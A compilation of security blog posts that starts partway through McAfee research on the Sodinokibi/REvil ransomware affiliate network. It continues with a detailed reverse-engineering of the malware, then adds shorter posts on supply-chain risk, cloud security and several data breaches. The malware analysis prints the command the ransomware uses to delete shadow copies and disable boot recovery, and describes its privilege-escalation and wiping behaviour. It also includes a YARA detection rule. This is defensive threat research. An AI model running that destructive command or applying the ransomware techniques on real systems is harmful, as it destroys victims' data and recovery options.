ID Increments
Overall, we observed a gradual increment in the ID number over time. The earlier versions generally had lower ID numbers and higher ID numbers appeared with the later versions.

However, there were relatively lower ID numbers that appeared in many versions, as shown in figure 3.

This observation aligned with our theory that the ID number corresponds with a particular affiliate. Certain affiliates remained partners for a long period of time, spreading different versions of GandCrab; this explains the ID number appearing over a longer period and in different versions. This theory has also been acknowledged by several (anonymous) sources.

Determining Top ID’s/Affiliates
When we applied the theory that the ID corresponded with an affiliate, we observed different activity amongst the affiliates. There are some affiliates/ID’s that were only linked to a single sample that we found. A reason for affiliates to only appear for a short moment can be explained by the failure to perform. The GandCrab developers had a strict policy of expelling affiliates that underperformed. Expelling an affiliate would open a new slot that would receive a new incremented ID number.

On the other hand, we observed several very active affiliates, “The All-Stars”, of which ID number 99 was by far the most active. We first observed ID 99 in six different samples of version 4.1.1, growing to 35 different samples in version 5.04. Based on our dataset we observed 71 unique unpacked samples linked to ID 99.

Being involved with several versions (consistency over time), in combination with the number of unique samples (volume) and the number of infections (based on industry malware detections) can effectively show which affiliate was the most aggressive and possibly the most important to the RaaS network.

Affiliate vs. Salesperson & Disruption

An active affiliate can be compared to a top salesperson in any normal commercial organization. Given that the income of the RaaS network is largely dependent on the performance of its top affiliates, identifying and disrupting a top affiliate’s activity can have a crippling effect on the income of the RaaS network, internal morale and overall RaaS performance. This can be achieved through arrests of an affiliate and/or co-conspirers.

Another way is disrupting the business model and lowering the ransomware’s profits through offering free decryption tools or building vaccines that prevent encryption. The disruption will increase the operational costs for the criminals, making the RaaS of less interest.

Lastly, for any future proceedings (suspect apprehension and legal) it is important to maintain a chain of custody linking victims, samples and affiliates together. Security providers as gatherers and owners of this data play a huge role in safeguarding this for the future.

Overview Versions and ID Numbers

Using an online tool from RAWGraphs we created a graphic display of the entire dataset showing the relationship between the versions and the ID numbers. Below is an overview, a more detailed overview can be found on the McAfee ATR Github.

FIGURE 4. OVERVIEW OF GANDCRAB VERSIONS AND IDs

Top performing affiliates immediately stood out from the rest as the lines were thicker and more spread out. According to our data, the most active ID numbers were 15,41,99 and 170. Determining the key players in a RaaS family can help Law Enforcement prioritize its valuable resources.

Where are the All-Stars? Top Affiliates Missing in 5.2

At the time we were not realizing it fully but, looking back at the overview, it stands out that none of the top affiliates/ID numbers where present in the final version 5.2 of GandCrab which was released in February. We believe that this was an early indicator that the end of GandCrab was imminent.

This discovery might indicate that some kind of event had taken place that resulted in the most active affiliates not being present. The cause could have been internal or external.

But what puzzles us is why would a high performing affiliate leave? Maybe we will never hear the exact reason. Perhaps it is quite similar to why people leave regular jobs… feeling unhappy, a dispute or leaving for a better offer.

With the absence of the top affiliates the question remains; Where did these affiliates go to?

FIGURE 5. ID AND SUB_ID NUMBER LINKED TO VERSION 5.2

Please note that active ID numbers 15,41,99 and170 from the complete overview are not present in any GandCrab version 5.2 infections. The most active affiliate in version 5.2. was nr 287.

Goodbye GandCrab, Hello Sodinokibi/REvil

In our opening episode we described the technical similarities we have seen between GandCrab and REvil. We are not the only ones that noticed these similarities – security reporter Brian Krebs published an article where he highlights the similarities between GandCrab and a new ransomware named Sodinokibi or REvil, and certain postings that were made on several underground forums.

Affiliates Switching RaaS Families….

On two popular underground Forums a user named UNKN, aka unknown, placed an advertisement on the 4th of July 2019, for a private ransomware as a service (RaaS) he had been running for some time. Below is a screenshot of the posting. Interesting is the response from a user with the nickname Lalartu. In a reply to the advertisement, Lalartu mentions that he is working with UNKN and his team, as well as that they had been a former GandCrab affiliate, something that was noticed by Bleepingcomputer too. Lalartu’s post supports our earlier observations that some top GandCrab affiliates suddenly disappeared and might have moved to a different RaaS family. This is something that was suspected but never confirmed with technical evidence.

We suspect that Lalartu is not the only GandCrab affiliate that has moved to Sodinokibi. If top affiliates have a solid and very profitable infection method available, then it does not make sense to retire with the developers.

Around February 2019, there was a noticeable change in some of GandCrab’s infections behavior. Managed Service Providers (MSP) were now targeted through vulnerable systems and their customers got infected with GandCrab on a large scale, something we had not seen performed before by any of the affiliates. Interestingly, shortly after the retirement of GandCrab, the MSP modus operandi was quickly adopted by Sodinokibi, another indication that a former GandCrab affiliate had moved to Sodinokibi.

This makes us suspect that Sodinokibi is actively recruiting the top performing affiliates from other successful RaaS families, creating a sort of all-star team.

At the same time, the RaaS market is such where less proficient affiliates can hone their skills, improve their spreading capabilities and pivot to the more successful RaaS families. Combined with a climate where relatively few ransomware arrests are taking place, it allows for an alarming cybercriminal career path with dire consequences.

Gathering “administration” from Sodinokibi/Revil Samples

Another similarity Sodinokibi shares with GandCrab is the administration of infections, one of the indicators of a RaaS’s growth potential. In our earlier blog we discussed that Sodinokibi generates a JSON config file for each sample containing certain values such as a PID number and a value labeled sub. So, we decided to use our GandCrab affiliate methodology on the Sodinokibi config files we were able to collect.

With GandCrab we had to write our own tool to pull the hardcoded indicators but, with Sodinokibi, we were lucky enough that Carbon Black had developed a tool that did much of the heavy lifting for us. In the end there were still some samples from which we had to pull the configs manually. The JSON file contains different values and fields; for a comparison to GandCrab we focused on the PID and SUB field of each sample as these values appeared to have a similar characteristic as the ID and SUB_ID field in the GandCrab samples.

FIGURE 6. REVIL JSON CONFIG VALUES

Interpreting the Data Structures

With the data we gathered, we used the same analysis methodology on Sodinokibi  as we did on GandCrab. We discovered that Sodinokibi has a RaaS structure very similar to GandCrab and with the Parent-Child relationship structure being nearly identical. Below we compared activity of GandCrab affiliate number 99 with the activity of the Sodinokibi affiliate number 19.

FIGURE 7. THE ACTIVITY OF GANDCRAB ID NO 99 (PARENT) AND ITS CORRESPONDING SUB (CHILDREN)

FIGURE 8. THE ACTIVITY OF SODINOKIBI PID NO 19 (PARENT) AND ITS CORRESPONDING SUB (CHILDREN)

It needs to be said that the timespan for the GandCrab overview was generated over a long period of time with a larger total of samples than the Sodinokibi overview.

Nevertheless, the similarity is quit striking.

The activity of both ID numbers displays a tree-shaped structure with the parent ID number at the root and branching out to the respective SUB numbers linked to multiple samples.

We believe that the activity above might be linked to a tiered affiliate group that is specialized in RDP brute forcing and infecting systems with Sodinokibi after each successful compromise.

Both RaaS family structures are too large to effectively publish within the space of this blog. Our Complete overview for the Sodinokibi RaaS structure can be found on our McAfee GitHub.

Conclusion

When we started our journey with GandCrab we did not expect it would take us so far down the rabbit hole. Mass sample analysis and searching for administration indicators provided a way to get more insight in a multi-million-dollar criminal enterprise, determine key players and foresee future events through changes in the business structure. We believe that the retirement of GandCrab was not an overnight decision and, based on the data on the affiliates, it was clear that something was going to happen.

With the emergence of Sodinokibi and the few forum postings by a high profile former GandCrab affiliate, everything fell into place. We have strong indications that some of the top affiliates have found a new home with Sodinokibi to further their criminal business.

Given that the income of the RaaS network is largely dependent on the performance of its top affiliates, and it is run like a normal business, we (the security industry) should not only research the products the criminals develop, but also identify possible ways to successfully disrupt the criminal business.

In our next episode we dive deeper into the financial streams involved in the affiliate program and provide an estimate of how much money these actors are earning with the ransomware-as-a-service business model.

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – The All-Stars appeared first on McAfee Blogs.

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us

Episode 1: What the Code Tells Us

McAfee’s Advanced Threat Research team (ATR) observed a new ransomware family in the wild, dubbed Sodinokibi (or REvil), at the end of April 2019. Around this same time, the GandCrab ransomware crew announced they would shut down their operations. Coincidence? Or is there more to the story?

In this series of blogs, we share fresh analysis of Sodinokibi and its connections to GandCrab, with new insights gleaned exclusively from McAfee ATR’s in-depth and extensive research.

  • Episode 1: What the Code Tells Us
  • Episode 2: The All-Stars
  • Episode 3: Follow the Money
  • Episode 4: Crescendo

In this first instalment we share our extensive malware and post-infection analysis and visualize exactly how big the Sodinokibi campaign is.

Background

Since its arrival in April 2019, it has become very clear that the new kid in town, “Sodinokibi” or “REvil” is a serious threat. The name Sodinokibi was discovered in the hash ccfde149220e87e97198c23fb8115d5a where ‘Sodinokibi.exe’ was mentioned as the internal file name; it is also known by the name of REvil.

At first, Sodinokibi ransomware was observed propagating itself by exploiting a vulnerability in Oracle’s WebLogic server. However, similar to some other ransomware families, Sodinokibi is what we call a Ransomware-as-a-Service (RaaS), where a group of people maintain the code and another group, known as affiliates, spread the ransomware.

This model allows affiliates to distribute the ransomware any way they like. Some affiliates prefer mass-spread attacks using phishing-campaigns and exploit-kits, where other affiliates adopt a more targeted approach by brute-forcing RDP access and uploading tools and scripts to gain more rights and execute the ransomware in the internal network of a victim. We have investigated several campaigns spreading Sodinokibi, most of which had different modus operandi but we did notice many started with a breach of an RDP server.

Who and Where is Sodinokibi Hitting?

Based on visibility from MVISION Insights we were able to generate the below picture of infections observed from May through August 23rd, 2019:

Who is the target? Mostly organizations, though it really depends on the skills and expertise from the different affiliate groups on who, and in which geo, they operate.

Reversing the Code

In this first episode, we will dig into the code and explain the inner workings of the ransomware once it has executed on the victim’s machine.

Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article.

Based on the code comparison analysis we conducted between GandCrab and Sodinokibi we consider it a likely hypothesis that the people behind the Sodinokibi ransomware may have some type of relationship with the GandCrab crew.

FIGURE 1.1. OVERVIEW OF SODINOKIBI’S EXECUTION FLAW

Inside the Code

Sodinokibi Overview

For this article we researched the sample with the following hash (packed):

The main goal of this malware, as other ransomware families, is to encrypt your files and then request a payment in return for a decryption tool from the authors or affiliates to decrypt them.

The malware sample we researched is a 32-bit binary, with an icon in the packed file and without one in the unpacked file. The packer is programmed in Visual C++ and the malware itself is written in pure assembly.

Technical Details

The goal of the packer is to decrypt the true malware part and use a RunPE technique to run it from memory. To obtain the malware from memory, after the decryption is finished and is loaded into the memory, we dumped it to obtain an unpacked version.

The first action of the malware is to get all functions needed in runtime and make a dynamic IAT to try obfuscating the Windows call in a static analysis.

FIGURE 2. THE MALWARE GETS ALL FUNCTIONS NEEDED IN RUNTIME

The next action of the malware is trying to create a mutex with a hardcoded name. It is important to know that the malware has 95% of the strings encrypted inside. Consider that each sample of the malware has different strings in a lot of places; values as keys or seeds change all the time to avoid what we, as an industry do, namely making vaccines or creating one decryptor without taking the values from the specific malware sample to decrypt the strings.

FIGURE 3. CREATION OF A MUTEX AND CHECK TO SEE IF IT ALREADY EXISTS

If the mutex exists, the malware finishes with a call to “ExitProcess.” This is done to avoid re-launching of the ransomware.

After this mutex operation the malware calculates a CRC32 hash of a part of its data using a special seed that changes per sample too. This CRC32 operation is based on a CRC32 polynomial operation instead of tables to make it faster and the code-size smaller.

The next step is decrypting this block of data if the CRC32 check passes with success. If the check is a failure, the malware will ignore this flow of code and try to use an exploit as will be explained later in the report.

FIGURE 4. CALCULATION OF THE CRC32 HASH OF THE CRYPTED CONFIG AND DECRYPTION IF IT PASSES THE CHECK

In the case that the malware passes the CRC32 check and decrypts correctly with a key that changes per sample, the block of data will get a JSON file in memory that will be parsed. This config file has fields to prepare the keys later to encrypt the victim key and more information that will alter the behavior of the malware.

The CRC32 check avoids the possibility that somebody can change the crypted data with another config and does not update the CRC32 value in the malware.

After decryption of the JSON file, the malware will parse it with a code of a full JSON parser and extract all fields and save the values of these fields in the memory.

FIGURE 5. PARTIAL EXAMPLE OF THE CONFIG DECRYPTED AND CLEANED

Let us explain all the fields in the config and their meanings:

  • pk -> This value encoded in base64 is important later for the crypto process; it is the public key of the attacker.
  • pid -> The affiliate number that belongs to the sample.
  • sub -> The subaccount or campaign id for this sample that the affiliate uses to keep track of its payments.
  • dbg -> Debug option. In the final version this is used to check if some things have been done or not; it is a development option that can be true or false. In the samples in the wild it is in the false state. If it is set, the keyboard check later will not happen. It is useful for the malware developers to prove the malware works correctly in the critical part without detecting his/her own machines based on the language.
  • fast -> If this option is enabled, and by default a lot of samples have it enabled, the malware will crypt the first 1 megabyte of each target file, or all files if it is smaller than this size. In the case that this field is false, it will crypt all files.
  • wipe -> If this option is ‘true’, the malware will destroy the target files in the folders that are described in the json field “wfld”. This destruction happens in all folders that have the name or names that appear in this field of the config in logic units and network shares. The overwriting of the files can be with trash data or null data, depending of the sample.
  • wht -> This field has some subfields: fld -> Folders that should not be crypted; they are whitelisted to avoid destroying critical files in the system and programs. fls -> List of whitelists of files per name; these files will never be crypted and this is useful to avoid destroying critical files in the system. ext -> List of the target extensions to avoid encrypting based on extension.
  • wfld -> A list of folders where the files will be destroyed if the wipe option is enabled.
  • prc -> List of processes to kill for unlocking files that are locked by this/these program/s, for example, “mysql.exe”.
  • dmn -> List of domains that will be used for the malware if the net option is enabled; this list can change per sample, to send information of the victim.
  • net -> This value can be false or true. By default, it is usually true, meaning that the malware will send information about the victim if they have Internet access to the domain list in the field “dmn” in the config.
  • nbody -> A big string encoded in base64 that is the template for the ransom note that will appear in each folder where the malware can create it.
  • nname -> The string of the name of the malware for the ransom note file. It is a template that will have a part that will be random in the execution.
  • exp -> This field is very important in the config. By default it will usually be ‘false’, but if it is ‘true’, or if the check of the hash of the config fails, it will use the exploit CVE-2018-8453. The malware has this value as false by default because this exploit does not always work and can cause a Blue Screen of Death that avoids the malware’s goal to encrypt the files and request the ransom. If the exploit works, it will elevate the process to SYSTEM user.
  • img -> A string encoded in base64. It is the template for the image that the malware will create in runtime to change the wallpaper of the desktop with this text.

After decrypting the malware config, it parses it and the malware will check the “exp” field and if the value is ‘true’, it will detect the type of the operative system using the PEB fields that reports the major and minor version of the OS.

FIGURE 6. CHECK OF THE VERSION OF THE OPERATIVE SYSTEM

Usually only one OS can be found but that is enough for the malware. The malware will check the file-time to verify if the date was before or after a patch was installed to fix the exploit. If the file time is before the file time of the patch, it will check if the OS is 64-bit or 32-bit using the function “GetSystemNativeInfoW”. When the OS system is 32-bit, it will use a shellcode embedded in the malware that is the exploit and, in the case of a 64-bit OS, it will use another shellcode that can use a “Heaven´s Gate” to execute code of 64 bits in a process of 32 bits.

FIGURE 7. CHECK IF OS IS 32- OR 64-BIT

In the case that the field was false, or the exploit is patched, the malware will check the OS version again using the PEB. If the OS is Windows Vista, at least it will get from the own process token the level of execution privilege. When the discovered privilege level is less than 0x3000 (that means that the process is running as a real administrator in the system or SYSTEM), it will relaunch the process using the ‘runas’ command to elevate to 0x3000 process from 0x2000 or 0x1000 level of execution. After relaunching itself with the ‘runas’ command the malware instance will finish.

FIGURE 8. CHECK IF OS IS WINDOWS VISTA MINIMAL AND CHECK OF EXECUTION LEVEL

The malware’s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process “Explorer.exe”, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later.

After this it will parse again the config and get information of the victim’s machine This information is the user of the machine, the name of the machine, etc. The malware prepares a victim id to know who is affected based in two 32-bit values concat in one string in hexadecimal.

The first part of these two values is the serial number of the hard disk of the Windows main logic unit, and the second one is the CRC32 hash value that comes from the CRC32 hash of the serial number of the Windows logic main unit with a seed hardcoded that change per sample.

FIGURE 9. GET DISK SERIAL NUMBER TO MAKE CRC32 HASH

After this, the result is used as a seed to make the CRC32 hash of the name of the processor of the machine. But this name of the processor is not extracted using the Windows API as GandCrab does; in this case the malware authors use the opcode CPUID to try to make it more obfuscated.

FIGURE 10. GET THE PROCESSOR NAME USING CPUID OPCODE

Finally, it converts these values in a string in a hexadecimal representation and saves it.

Later, during the execution, the malware will write in the Windows registry the next entries in the subkey “SOFTWARE\recfg” (this subkey can change in some samples but usually does not).

The key entries are:

  • 0_key -> Type binary; this is the master key (includes the victim’s generated random key to crypt later together with the key of the malware authors).
  • sk_key -> As 0_key entry, it is the victim’s private key crypted but with the affiliate public key hardcoded in the sample. It is the key used in the decryptor by the affiliate, but it means that the malware authors can always decrypt any file crypted with any sample as a secondary resource to decrypt the files.
  • pk_key -> Victim public key derivate from the private key.
  • subkey -> Affiliate public key to use.
  • stat -> The information gathered from the victim machine and used to put in the ransom note crypted and in the POST send to domains.
  • rnd_ext -> The random extension for the encrypted files (can be from 5 to 10 alphanumeric characters).

The malware tries to write the subkey and the entries in the HKEY_LOCAL_MACHINE hive at first glance and, if it fails, it will write them in the HKEY_CURRENT_USER hive.

FIGURE 11. EXAMPLE OF REGISTRY ENTRIES AND SUBKEY IN THE HKLM HIVE

The information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc.

After this step is completed, the malware will check the “dbg” option gathered from the config and, if that value is ‘true’, it will avoid checking the language of the machine but if the value is ‘false’ ( by default), it will check the machine language and compare it with a list of hardcoded values.

FIGURE 12. GET THE KEYBOARD LANGUAGE OF THE SYSTEM

The malware checks against the next list of blacklisted languages (they can change per sample in some cases):

  • 0x818 – Romanian (Moldova)
  • 0x419 – Russian
  • 0x819 – Russian (Moldova)
  • 0x422 – Ukrainian
  • 0x423 – Belarusian
  • 0x425 – Estonian
  • 0x426 – Latvian
  • 0x427 – Lithuanian
  • 0x428 – Tajik
  • 0x429 – Persian
  • 0x42B – Armenian
  • 0x42C – Azeri
  • 0x437 – Georgian
  • 0x43F – Kazakh
  • 0x440 – Kyrgyz
  • 0x442 –Turkmen
  • 0x443 – Uzbek
  • 0x444 – Tatar
  • 0x45A – Syrian
  • 0x2801 – Arabic (Syria)

We observed that Sodinokibi, like GandCrab and Anatova, are blacklisting the regular Syrian language and the Syrian language in Arabic too. If the system contains one of these languages, it will exit without performing any action. If a different language is detected, it will continue in the normal flow.

This is interesting and may hint to an affiliate being involved who has mastery of either one of the languages. This insight became especially interesting later in our investigation.

If the malware continues, it will search all processes in the list in the field “prc” in the config and terminate them in a loop to unlock the files locked for this/these process/es.

FIGURE 13. SEARCH FOR TARGET PROCESSES AND TERMINATE THEM

After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command:

  • exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures

It is executed with the Windows function “ShellExecuteW”.

FIGURE 14. LAUNCH COMMAND TO DESTROY SHADOW VOLUMES AND DESTROY SECURITY IN THE BOOT

Next it will check the field of the config “wipe” and if it is true will destroy and delete all files with random trash or with NULL values. If the malware destroys the files , it will start enumerating all logic units and finally the network shares in the folders with the name that appear in the config field “wfld”.

FIGURE 15. WIPE FILES IN THE TARGET FOLDERS

In the case where an affiliate creates a sample that has defined a lot of folders in this field, the ransomware can be a solid wiper of the full machine.

The next action of the malware is its main function, encrypting the files in all logic units and network shares, avoiding the white listed folders and names of files and extensions, and dropping the ransom note prepared from the template in each folder.

FIGURE 16. CRYPT FILES IN THE LOGIC UNITS AND NETWORK SHARES

After finishing this step, it will create the image of the desktop in runtime with the text that comes in the config file prepared with the random extension that affect the machine.

The next step is checking the field “net” from the config, and, if true, will start sending a POST message to the list of domains in the config file in the field “dmn”.

FIGURE 17. PREPARE THE FINAL URL RANDOMLY PER DOMAIN TO MAKE THE POST COMMAND

This part of the code has similarities to the code of GandCrab, which we will highlight later in this article.

After this step the malware cleans its own memory in vars and strings but does not remove the malware code, but it does remove the critical contents to avoid dumps or forensics tools that can gather some information from the RAM.

FIGURE 18. CLEAN MEMORY OF VARS

If the malware was running as SYSTEM after the exploit, it will revert its rights and finally finish its execution.

FIGURE 19. REVERT THE SYSTEM PRIVILEGE EXECUTION LEVEL

Code Comparison with GandCrab

Using the unpacked Sodinokibi sample and a v5.03 version of GandCrab, we started to use IDA and BinDiff to observe any similarities. Based on the Call-Graph it seems that there is an overall 40 percent code overlap between the two:

FIGURE 20. CALL-GRAPH COMPARISON

The most overlap seems to be in the functions of both families. Although values change, going through the code reveals similar patterns and flows:

Although here and there are some differences, the structure is similar:

 

We already mentioned that the code part responsible for the random URL generation has similarities with regards to how it is generated in the GandCrab malware. Sodinokibi is using one function to execute this part where GandCrab is using three functions to generate the random URL. Where we do see some similar structure is in the parts for the to-be-generated URL in both malware codes. We created a visual to explain the comparison better:

FIGURE 21. URL GENERATION COMPARISON

We observe how even though the way both ransomware families generate the URL might differ, the URL directories and file extensions used have a similarity that seems to be more than coincidence. This observation was also discovered by Tesorion in one of its blogs.

Overall, looking at the structure and coincidences, either the developers of the GandCrab code used it as a base for creating a new family or, another hypothesis, is that people got hold of the leaked GandCrab source code and started the new RaaS Sodinokibi.

Conclusion

Sodinokibi is a serious new ransomware threat that is hitting many victims all over the world.

We executed an in-depth analysis comparing GandCrab and Sodinokibi and discovered a lot of similarities, indicating the developer of Sodinokibi had access to GandCrab source-code and improvements. The Sodinokibi campaigns are ongoing and differ in skills and tools due to the different affiliates operating these campaigns, which begs more questions to be answered. How do they operate? And is the affiliate model working? McAfee ATR has the answers in episode 2, “The All Stars.”

Coverage

McAfee is detecting this family by the following signatures:

  • “Ransom-Sodinokibi”
  • “Ransom-REvil!”.

MITRE ATT&CK Techniques

The malware sample uses the following MITRE ATT&CK™ techniques:

  • File and Directory Discovery
  • File Deletion
  • Modify Registry
  • Query Registry
  • Registry modification
  • Query information of the user
  • Crypt Files
  • Destroy Files
  • Make C2 connections to send information of the victim
  • Modify system configuration
  • Elevate privileges

YARA Rule

rule Sodinokobi

{

/*

This rule detects Sodinokobi Ransomware in memory in old samples and perhaps future.

*/

meta:

author      = “McAfee ATR team”

version     = “1.0”

description = “This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future.”

strings:

$a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }

$b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }

condition:

all of them

}

 

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us appeared first on McAfee Blogs.

Security in A World of “WE” – Embracing Our Third Party Ecosystems

In our increasingly digital world, technological innovation not only presents new opportunities, but also raises new risks and challenges that must be addressed collaboratively by industry, buyers, users, and policymakers. Specifically, digitization demands that risk be addressed across a dramatically expanding supply chain. These risks include the security threats of manipulation, espionage and disruption of information and information systems and services.

Empirical reports reveal that the third party ecosystem remains a fundamental risk to the integrity of our information systems. For example, analysis of the last nine consecutive years of Verizon’s global Data Breach Investigation Reports illustrates that where breaches can be attributed, 73% arise from the third party ecosystem. Moreover, not only are we increasing the volume of third parties in our information systems supply chains, we continue to invite third parties into our security inner sanctums – our security enforcing technology. Cisco’s 2018 Annual Cybersecurity Report revealed that 79% of global enterprises and governments rely on at least 20 third party security vendors.

The message is clear: the cyber supply chain and its related third party risk must be addressed. These security risks must be tackled comprehensively across all stages of the supply chain, including design, software development, manufacturing and sustainment. In parallel, our procurement practices, policies and certification and validation schemas should also seek to mitigate the impact of this third party risk. Public-private partnership brings civilian, government and defense agencies together with private industry to develop meaningful recommendations to effectively mitigate third party risk. NATO has recognized and is actively addressing this challenge in coordination with its member nations.

I will tackle this very challenge in my upcoming keynote, “The Trolls Under the Bridge: Who & What Lurks in Your Supply Chain?” at NATO’s NIAS19 Conference in Mons, Belgium in October https://nias19.com. I will share views on a path forward to meaningfully reduce risk across the increasingly broad and deep third party ecosystem upon which governments and enterprises around the world rely. I look forward to sharing the perspective that we simply must drive what I refer to as Pervasive Security. Pervasive Security designed to deploy a layered approach balancing physical security, operational security, behavioral security, information security and security technology across the cyber supply chain based on risk prioritization.

My discussion will build on NATO’s  2017 Technical and Implementation Directive on Supply Chain Security for COTS CIS Security Enforcing Products.  And, I will showcase a practical framework to identify, prioritize and mitigate the impacts of tainted and counterfeit information systems technology across the supply chain and its third party members.

One of NIAS19’s key themes is “supply chain security challenges”.  Specifically to answer that challenge, I will discuss tested, practical methods to address those challenges. After all, risk travels up and down the supply chain. Approaching supply chain security comprehensively is key to ensuring successful risk management. Fundamental steps to comprehensive security require that all supply chains:

1. Identify areas of potential impact, for example:

  • Risks to continuity of supply of third party provided software, services, components and raw materials
  • Natural disasters
  • Geopolitical and economic disruption
  • Workforce instability
  • Financial volatility
  • Weak infrastructure security
  • Insufficient end-user risk awareness

2. Prioritize risk by both likelihood of occurrence and severity of impact

3. Establish criteria for mitigating security threats and reducing the impact of incidents

4. Collaborate with industry and government on policy, regulations and directives.

October is Cybersecurity Awareness Month! Join the conversation, as all of us are part of the global supply chain. For additional insight on this challenge visit Cisco’s Value Chain Security Capability.

Security is Shifting to a Unified Cloud Edge

More than 95% of companies today use cloud services, and 83% store sensitive data in the cloud. Mobile devices and laptops allow for work to occur both inside and outside the network, pushing the boundary for security to a new edge defined by the cloud. Yet only 30% of companies today can protect data with the same policies on their devices, network, and in the cloud. Only 36% can enforce data loss prevention (DLP) rules in the cloud at all. And sixty percent currently have no way to stop a personal, unsecured mobile device from downloading sensitive data from the cloud, completely invisible to IT.

We’re in the midst of a transition from the network-centric, walled-garden model of security to one defined by device and cloud control points, which allows for freedom of motion to any location where work gets done, and in any cloud service.

We call this a Unified Cloud Edge. It is our vision for how companies can secure their data in a consistent manner as it moves between devices and the cloud, and from cloud to cloud. By following the data, we can see this vision come to life:

  • Data at the device, going to the cloud. Data Loss Prevention (DLP) stops any data that should not enter the cloud from leaving a managed device.
  • Device access to data in cloud services. The combination of a Cloud Access Security Broker (CASB) and Secure Web Gateway (SWG) control access to all cloud services, with the CASB controlling access to sanctioned services like Office 365 and the SWG covering every other service, including Shadow IT.
  • Data in the cloud, moving from cloud to cloud. CASB uses an API-based connection to cloud services for complete visibility and control over data within the cloud services you sanction, as well as data in motion from one cloud service to another. And machine learning capabilities give you the ability to stop threats in the cloud.
  • Data in the cloud, going to an unmanaged, personal device. CASB uses a reverse proxy to enforce authentication to your sanctioned cloud services, blocking access to any devices you don’t want to access your data, such as a personal iOS or Android devices.

 

Figure 1: Simplified architecture for Unified Cloud Edge

Each of the control points in this architecture are built to work together seamlessly. In our Technical Preview of Unified Cloud Edge, we go into more detail on the management and policy creation experience, with examples of what you’ll see day to day. Head over here to download it.

For security and data protection admins, we know much of the daily work is allocated to investigation and incident management workflows. That’s why with Unified Cloud Edge, we’ve centralized all reporting, incident management, and investigation workflows for endpoint, network, and cloud data protection in McAfee ePO. For our customers with existing data protection classification and policies in ePO, we’ve also enabled a simple synchronization to our CASB for fast and efficient policy creation in the cloud.

Keep reading in our detailed Technical Preview of Unified Cloud Edge here, and contact us if you want to discuss implementation at your organization.

The post Security is Shifting to a Unified Cloud Edge appeared first on McAfee Blogs.

Hacker Claims to Have Compromised 200 Million Words with Friends Accounts

The hacker allegedly behind the Collection #1 and Collection #2 data breaches has claimed responsibility for the compromise of more than 200 million users of a popular iOS and Android gaming app.

Online cybersecurity site the Hacker News reported earlier this week that Pakistani hacker Gnosticplayers had gained access to the player database of Zynga’s Scrabble clone called Words with Friends, and the personal information of 218 million users.

Gnosticplayers shared a data sample that included user names, email addresses, logins, passwords, phone numbers, Facebook IDs, and Zynga account IDs.

Zynga released a statement saying only that, “certain player account information may have been illegally accessed by outside hackers. But since that announcement on September 12, it has declined to comment further. 

The Collection #1 and Collection #2 hacks made the information of 747 million stolen accounts from over 20 websites available on the dark web earlier in 2019.

Words with Friends users should update their passwords and practice good cyber-hygiene, including not re-using passwords, and checking online services like haveibeenpwned.com to determine if any of their other accounts have been affected.

The post Hacker Claims to Have Compromised 200 Million Words with Friends Accounts appeared first on Adam Levin.

Do You Know If Your DNS Server Can Be Used For DDoS Attacks?

Melissa Bruno // So you have an Internet-facing DNS server. Maybe you decided to set one up at home for fun, or your company has one that works with other services. Either way, you probably have a group of people in mind who should be using it. But are you sure that they’re the only […]

The post Do You Know If Your DNS Server Can Be Used For DDoS Attacks? appeared first on Black Hills Information Security.

Former American Express employee under investigation for customers’ data abuse

Authorities are investigating an American Express employee for unauthorized access to cardholder information and potentially abuse for fraud.

Authorities launched a criminal investigation on an American Express employee that is suspected to accessed to cardholder information and potentially abused for fraud.

Exposed information includes full name, physical and/or billing address, Social Security numbers, birth dates, and the credit card number.

The suspect is no longer working for the financial organization.

On September 30th, 2019, the financial institution began sending out data breach notifications to the impacted, the notice informed them that the former employee potentially used the data for fraudulent activities, including identity theft and financial frauds.

“It was brought to our attention that personal information, related to your American Express Card account listed above, may have been wrongfully accessed by one of our employees in an attempt to conduct fraudulent activity, including potentially opening accounts at other financial institutions.” reads the data breach notification. “In response, we immediately launched an investigation and are fully cooperating with law enforcement agencies to further their investigation.

American Express is offering free credit monitoring services through Experian Identity Works to impacted customers.

The company is also recommending impacted cardholders to monitor their credit report and statements for any fraudulent activity and report any suspicious activity to their bank.

Pierluigi Paganini

(SecurityAffairs – American Express, cybercrime)

The post Former American Express employee under investigation for customers’ data abuse appeared first on Security Affairs.

In Identity Theft the Target is You!

The hard truth is that identity data is the new gold—and criminal panhandlers are mining it for sale and distribution on the Dark Web.

Indeed, the internet provides ways for big data breaches to result in disastrous leaks of huge databases of personal information, resulting in detailed profiles of individuals—based on their internet behaviors, including social media activities, online shopping, financial transactions and more—being sold for nefarious purposes.

It’s all about identity theft. What does it mean for digital citizens like us? And what can we do about it?

The Mining of Identity Data

In 2019, data of all kinds is being criminally mined on the internet, but the theft and sale of identity data in particular is rising dramatically. How is this possible? In today’s highly-connected society, we’re constantly being asked to provide personal information to retailers, surveys, medical professionals, and other data collection efforts. We constantly disclose our name, address, social security number, health status, purchasing history, credit card numbers, and more. Anytime there’s a breach in an online database holding such data, by accident or malicious hacker intent, cybercriminals pounce on it to mine it for the identity gold.

“Identity theft and identity fraud…refer to all types of crime in which someone wrongfully obtains and uses another person’s personal data…,” says the US Department of Justice, Criminal Division, in its Fraud Section report, reminding us what it’s all about. Data breaches are the goldmine for this kind of theft.

